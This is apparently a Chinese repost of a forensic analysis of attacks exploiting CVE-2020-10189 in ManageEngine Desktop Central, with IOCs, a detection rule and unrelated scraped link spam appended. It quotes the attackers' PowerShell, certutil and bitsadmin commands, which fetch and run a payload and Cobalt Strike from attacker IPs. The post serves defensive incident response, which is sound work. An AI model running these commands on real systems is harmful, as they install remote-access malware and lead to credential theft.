activex control test container 服务器正在运行中_Desktop Central服务器RCE漏洞在野攻击分析...
0x01 漏洞披露
在研究Desktop Central漏洞的过程中,我们在推特上找到了一位研究人员的帖子,该研究人员于2020年3月5日披露了Desktop Central的RCE漏洞。
Zoho ManageEngine Desktop Central 10允许远程执行代码,漏洞成因是FileStorage类的getChartImage中的不可信数据反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有关。
对CVE-2020-10189的研究还显示,可以在Shodan上搜索易受攻击的Desktop Central服务器。
图2-在Shodan上可搜索的易受攻击的Desktop Central服务器
在公网发现的威胁是有可疑的PowerShell下载通讯录,该通讯录包含下载文件的说明。
最早威胁活动之一是一些可疑的PowerShell下载命令。该命令包含指令,以下载install.bat并storesyncsvc.dll到C:\Windows\Temp,然后立即执行install.bat(图3)。
cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
图3-可疑的PowerShell下载命令
该install.bat脚本包含storesyncsvc.dll作为服务安装在系统上的说明。(图4)。
图4-Install.bat的内容
在运行PowerShell命令后,我们观察到安装了服务名称StorSyncSvc和显示名称为Storage Sync Service(图5)的新服务。
图5-安装Storage Sync Service
VirusTotal上的查询结果表明,一些检测引擎已经归类storesyncsvc.dll为恶意软件。
https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details
0x02 利用过程跟踪识别漏洞利用
此RCE漏洞已于2020年3月5日通过Twitter公开。
回顾Sysmon流程创建事件,表明C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe流程是负责执行PowerShell Download命令的流程(图6)。
图6-ParentImage负责PowerShell的下载
查看内存中的进程,我们还观察到Desktop Central java.exe应用程序cmd.exe和2.exe之间的父/子进程关系(图7)。
图7- java.exe父/子进程关系
0x03 利用文件系统识别漏洞利用
为了进一步验证我们的理论,我们将从受影响的Desktop Central服务器收集的信息与已发布的POC进行了比较,确定攻击者可能利用了CVE-2020-10189漏洞在此易受攻击的系统上运行代码。
通过文件系统时间轴分析,我们确定遍历文件写可能已在具有文件名_chart(图8)和logger.zip(图9)的系统上发生。
图8- _chart文件系统分析
图9- logger.zip文件系统分析
这些文件名也在@Steventseeley发布的POC中进行了引用(图10)。
图10-POC中对_chart和logger.zip的引用,参考:https : //srcincite.io/pocs/src-2020-0011.py.txt
0x04 引入系统命令
在随后的流程创建日志中,cmd.exe使用certutil.exe命令来下载和执行2.exe(图11),进一步的分析表明,很有可能 2.exe可能是C2工具Cobalt Strike的一部分。
cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe
图11-Certutil命令
OSINT透露2.exe已被VirusTotal上的多个检测引擎识别为恶意软件:https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details
利用app.any.run沙箱(图12)和对恶意软件的内存分析,进一步证实2.exe托管Cobalt Strike Beacon payload的可能性。
图12- 2.exe被判定为恶意软件
https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6
我们对已知恶意软件2.exe所使用的所有内存段进行了yara扫描,yara扫描结果进一步支持了2.exe在其他几种可能的恶意软件签名的理论(图13)。
图13-Yarascan扫描结果
利用Volatility的恶意插件,我们确定了几个可能存在代码注入迹象的内存部分,我们对另一个由malfind转储的内存段进行了yara扫描,进一步证实了我们的猜想。
在下面的记录中可以看到整个过程(图14)。
(原文中查看完整过程)
图14-Yarascan验证结果
然后,我们检查了malfind的输出以获得代码注入的证据,并确定了其中的可疑内存部分svchost.exe(图15)。OSINT的研究使我们找到了一位研究人员,该研究人员对恶意软件进行了逆向,并找到了负责向其中注入代码的部分svchost.exe(图16)。
图15-对包含注入代码的svchost的分析
图16-@VK_Intel的分析显示了可能的注入功能
参考:
在攻击结束后,我们观察到了恶意的Bitsadmin命令,其中包含install.bat从66.42.96.220可疑端口12345进行转移的指令。
我们的分析师观察到,bitsadmin命令正在Desktop Central服务器上运行,该命令包含在PowerShell下载命令中调用的相同IP地址,端口和相同的install.bat文件(图17)。
cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat
图17-Bitsadmin命令
0x05 访问凭证
我们还观察到了潜在的凭证访问活动。攻击者执行凭据转储的常用技术是使用恶意进程(SourceImage)访问另一个进程(TargetImage),最常见的是将lsass.exe作为目标,因为它通常包含敏感信息,例如帐户凭据。
在这里,我们观察到SourceImage 2.exe访问TargetImage lsass.exe(图18)。Cobalt Strike Beacon包含类似于Mimikatz的本机凭证转储功能,使用此功能的唯一必要条件是攻击者具有的SYSTEM特权,以下事件提供了充分的证据证明凭证访问的风险很高。
图18- 2.exe访问lsass.exe
在对这种入侵进行分析的过程中,我们向Eric Zimmerman的KAPE工具添加了一些收集目标功能,以将相关日志添加到分类工作中。
工具地址:https://binaryforay.blogspot.com/2019/02/introducing-kape.html
针对相关日志的用法示例:
kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs
Sigma项目的Florian Roth创建了一个签名来检测攻击者利用的某些技术:
https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml
我们对该攻击的分析还发现,在进程创建日志中基于命令行活动进行检测将很有价值:
ParentImage | endswith:
'DesktopCentral_Server\jre\bin\java.exe'
CommandLine | contains:
'*powershell*'
'*certutil*'
'*bitsadmin*'
0x06 IOCs
·Storesyncsvc.dll
· MD5: 5909983db4d9023e4098e56361c96a6f
· SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c
·Install.bat
· MD5: 7966c2c546b71e800397a67f942858d0
· SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc
·2.exe
· MD5: 3e856162c36b532925c8226b4ed3481c
· SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309
· 66[.]42[.]98[.]220
· 91[.]208[.]184[.]78
· 74[.]82[.]201[.]8
参考及来源:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle
activex control test container 服务器正在运行中_Desktop Central服务器RCE漏洞在野攻击分析...相关推荐
- vs2010添加TSTCON( ActiveX Control Test Container )工具
vs2010中的TSTCON( ActiveX Control Test Container )工具非自动安装,而是作为一个例程提供.所以应找到该例程,并编译: 如vs2010安装在默认路径则 1, ...
- VS2008 ActiveX(ocx控件)的调试工具ActiveX Control Test Container安装说明
vs2008中的TSTCON( ActiveX Control Test Container )工具非自动安装,而是作为一个例程提供.所以应找到该例程,并编译: 如vs2008安装在默认路径则 1, ...
- W10的服务器正在运行,win10开机提示服务器正在运行中的解决教程
今天小编给大家分享的是win10开机提示服务器正在运行中的解决教程.最近有win10的用户反映,在开机的时候莫名的就出现了个"服务器正在运行中"的气泡提示,出现此问题困扰的用户,请 ...
- win8.1 服务器正在运行,Win8.1系统打开IE浏览器提示服务器正在运行中的解决方法图文教程...
win8.1系统自带有ie浏览器,在使用过程中难免会遇到一些故障问题,这不有些用户说win8.1系统打开ie浏览器提示"服务器正在运行中",导致浏览器无法正常运行,该如何解决呢?大 ...
- VC 操作Word, Excel 出现服务器正在运行中 Ole Server Busy对话框的原因分析和解决建议
问题描述: 最近帮朋友弄个程序,处理Office Excel表.该Excel表加了密码,并且含有很多数据,当在VC中通过 Excel Ole对象打开该Excel文档时候,出现 "服务器正在运 ...
- 应用软件提示服务器正在运行,Win10开机提示服务器正在运行中怎么办?
Win10开机提示服务器正在运行中怎么办?天下太平,马放南山.固然不失人生一大幸事.然后计算机遇到点小坎坷,也属生活常态.比如打开Win10电脑,出现如下提示窗口: 服务器正在运行中 由于另一个程序正 ...
- 重装系统后出现服务器正在运行中,win7系统重装完后怎么一直显示正在启动 - 卡饭网...
win7系统重装完之后如何保留自己的桌面等系统设置 win7系统重装完之后如何保留自己的桌面等系统设置 系统重装这是难免的事情,但是重装系统最让人郁闷的事情莫过于系统的设置了.很多个人的设置都需要重新 ...
- 组态王弹出服务器正在运行中,组态王常见问题集锦(二)
1.变量设定中最大(小)值及最大(小)原始值意义? 答:组态王变量的属性页中的最小原始值.最大原始值和最小值.最大值这四个数值是用来确定原始值与工程值之间的转换比例(当最小值和最小原始值一样,最大值和 ...
- 服务器在运行中,由于另一个程序正在运行中,此操作无法完成
Visual Studio2008中用excel automation读取Excel文档,有时会程序提示"由于另一个程序正在运行中,此操作无法完成.请选择'切换到'来激活正在运行中的程序,并 ...
最新文章
- [20180102]11g的V$SORT_USAGE视图.txt
- SpringCloud Ribbon源码探索学习
- day15-pymysql模块的使用
- CG CTF PWN When did you born?
- Java大数加法乘法减法、36进制加法
- 算法知识之最长公共子序列问题(动态规划)
- 产品经理应该干些啥?
- VS2015上配置opencv2.4.11
- caffe data层_Caffe Softmax层的实现原理?
- pcap文件提取后的dataframe,切分前向流与后向流
- 20180918-1 词频统计
- PHP文件系统-文件的读写操作
- 一个安全架构师需要做什么?有什么能力要求?
- 手刃豆瓣top250排行榜
- 职场生存--向上管理
- 计算机网络-数据链路层 1
- u盘安装red linux,U盘安装Red Hat Enterprise Linux(方法1)
- python猴子选大王讲解_python 【猴子选大王】算法示例
- CTFHUB——RCE之eval执行和文件包含漏洞
- 掌握五点,普通网站的优化不再是什么难事
热门文章
- Region实战SVG地图点击
- 快捷指令 python_快捷指令 pythonista wifi连接上局域网(自动)唤醒主机电脑或投影仪...
- winscp连接windows_winscp登陆云主机,winscp登陆云主机如何登陆,教程详情
- 下面( )对象表示标准输入对象流。_7000字带你死磕Java I/O流知识
- springMVC接收数据和响应返回
- java调用机器上的shell脚本
- 剑指Offer(四):重建二叉树
- 父元素与子元素的width关系
- Unity协程(Coroutine)原理深入剖析
- scp在Linux主机之间copy不用输入密码